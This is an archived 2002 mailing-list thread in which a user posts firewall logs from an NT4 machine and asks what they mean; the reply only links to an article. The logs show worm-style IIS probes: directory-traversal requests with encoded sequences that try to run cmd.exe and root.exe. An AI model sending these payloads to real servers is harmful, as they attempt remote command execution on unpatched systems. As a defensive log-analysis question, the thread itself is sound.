Re: Can someone tell me what this is exactly?

From: John Cesta (lists@lookwww.com)
Date: 03/13/02

• Next message: Andrew: "Re: Can someone tell me what this is exactly?"
• Previous message: ssp2000: "Restrict IP subnet in windows 2000"
• In reply to: sg1: "Can someone tell me what this is exactly?"
• Next in thread: Andrew: "Re: Can someone tell me what this is exactly?"
• Reply: Andrew: "Re: Can someone tell me what this is exactly?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: John Cesta <lists@lookwww.com>
Date: Wed, 13 Mar 2002 18:36:04 GMT

Read this:

http://www.serverautomationtools.com/webcgi/webbatch.exe?techsupt/tsleft.web+MS-Security-Virus-Hacks-links+Do-your-logfiles-contain-this.html

John Cesta

http://www.cybersmarts.net
-------------------------------------------
ColdFusion ASP and ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
---------------------------------
LogFileManager - An IIS Logfile Management Tool
WebPageChecker - Minimize Server Downtime
DomainReportIt PRO - Helps Convert IIS Installs
http://www.serverautomationtools.com

On Wed, 13 Mar 2002 15:07:52 +1100, sg1 <news@nospam.com> wrote:

>Every time I connect to the net with my nt4 ws box I am bombarded with
>scans and portmaps, most of which are inconsequential.
>But port 80 connections seem to get through. This is a concern. Here is
>a sample of the logs.
>
>
>[01/16/2002 10:01:45.483 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:01:46.765 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:09:56.670 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:09:56.770 GMT+1100] GET /scripts/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:11:25.447 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:11:26.419 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:11:26.529 GMT+1100] GET /MSADC/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:12:56.218 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:12:57.189 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:12:57.389 GMT+1100] GET /c/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:14:26.938 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:14:27.930 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:14:28.070 GMT+1100] GET /d/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:15:57.679 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:15:58.770 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:15:59.001 GMT+1100] GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:17:28.459 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:17:29.701 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:17:30.672 GMT+1100] GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:19:01.693 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:19:03.015 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:19:03.105 GMT+1100] GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:20:32.464 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:20:33.465 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:20:34.346 GMT+1100] GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:22:04.857 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:22:07.130 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:22:07.220 GMT+1100] GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:22:15.151 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:22:15.232 GMT+1100] GET /scripts/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:23:35.647 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:23:36.669 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:23:36.749 GMT+1100] GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:23:44.890 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:23:46.152 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:23:46.252 GMT+1100] GET /MSADC/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:25:06.448 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:25:07.469 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:25:07.559 GMT+1100] GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:25:16.112 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:25:20.378 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:25:20.508 GMT+1100] GET /c/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:26:37.188 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:26:38.210 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:26:38.290 GMT+1100] GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:26:50.127 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:26:51.819 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:26:52.190 GMT+1100] GET /d/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:28:07.939 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:28:08.890 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:28:09.060 GMT+1100] GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:28:22.99 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:28:23.812 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:28:23.882 GMT+1100] GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:29:38.689 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:29:39.711 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:29:39.821 GMT+1100] GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:29:54.242 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:29:55.864 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:29:55.954 GMT+1100] GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:31:09.490 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:31:10.361 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:31:10.441 GMT+1100] GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:31:25.503 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:31:29.879 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:31:29.999 GMT+1100] GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:32:40.170 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:32:41.111 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:32:41.202 GMT+1100] GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:32:59.197 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:33:04.705 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:33:04.806 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:34:10.931 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>
>This is just a half hours worth of logs, but you can see that once
>connected they are actually executing commands.
>
>Any help interpreting this or advice would be appreciated.
>AdvThanksAnce,
>
>Sg1

---

• Next message: Andrew: "Re: Can someone tell me what this is exactly?"
• Previous message: ssp2000: "Restrict IP subnet in windows 2000"
• In reply to: sg1: "Can someone tell me what this is exactly?"
• Next in thread: Andrew: "Re: Can someone tell me what this is exactly?"
• Reply: Andrew: "Re: Can someone tell me what this is exactly?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: excessive TCP dulplicate acks revisted ... The tcp duplicate ACK attack is back. ... there was a thread on duplicate TCP acks in -CURRENT. ... TCP STREAM TEST from localhost port 0 AF_INET to greenhouse- george.18clay.com port 0 AF_INET ... Socket Socket Message Elapsed ... (freebsd-current) excessive TCP dulplicate acks revisted ... The tcp duplicate ACK attack is back. ... there was a thread on duplicate TCP acks in -CURRENT. ... TCP STREAM TEST from localhost port 0 AF_INET to greenhouse- george.18clay.com port 0 AF_INET ... Socket Socket Message Elapsed ... (freebsd-current) RE: How does that tcp traffic work ... How does that tcp traffic work ... The server will also pick an available port, ... session use the port that it's listening for the tcp ... For example, host A is a client, host B is a webserver ... (RedHat) Re: How to tell if a firewall alert is suspicious or not ... > WHY this SBCGlobal DNS server would be contacting Adobe Acrobat on port ... They have to parts, a kernel and the userland, in which programs, which are ... With Internet Protocol and TCP it is so, that any network interface in the ... To initiate a TCP connection, first the server has to "listen" on a port. ... (comp.security.firewalls) RE: Configure Hardware Firewall for SBS 2003 ... the corresponding ports to the SBS box. ... When a router is deployed at the SBS end, you must forward the port numbers ... TCP 110 This port is used for POP3 mail clients. ... TCP 1723 PPTP VPN connection ... (microsoft.public.windows.server.sbs)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(17)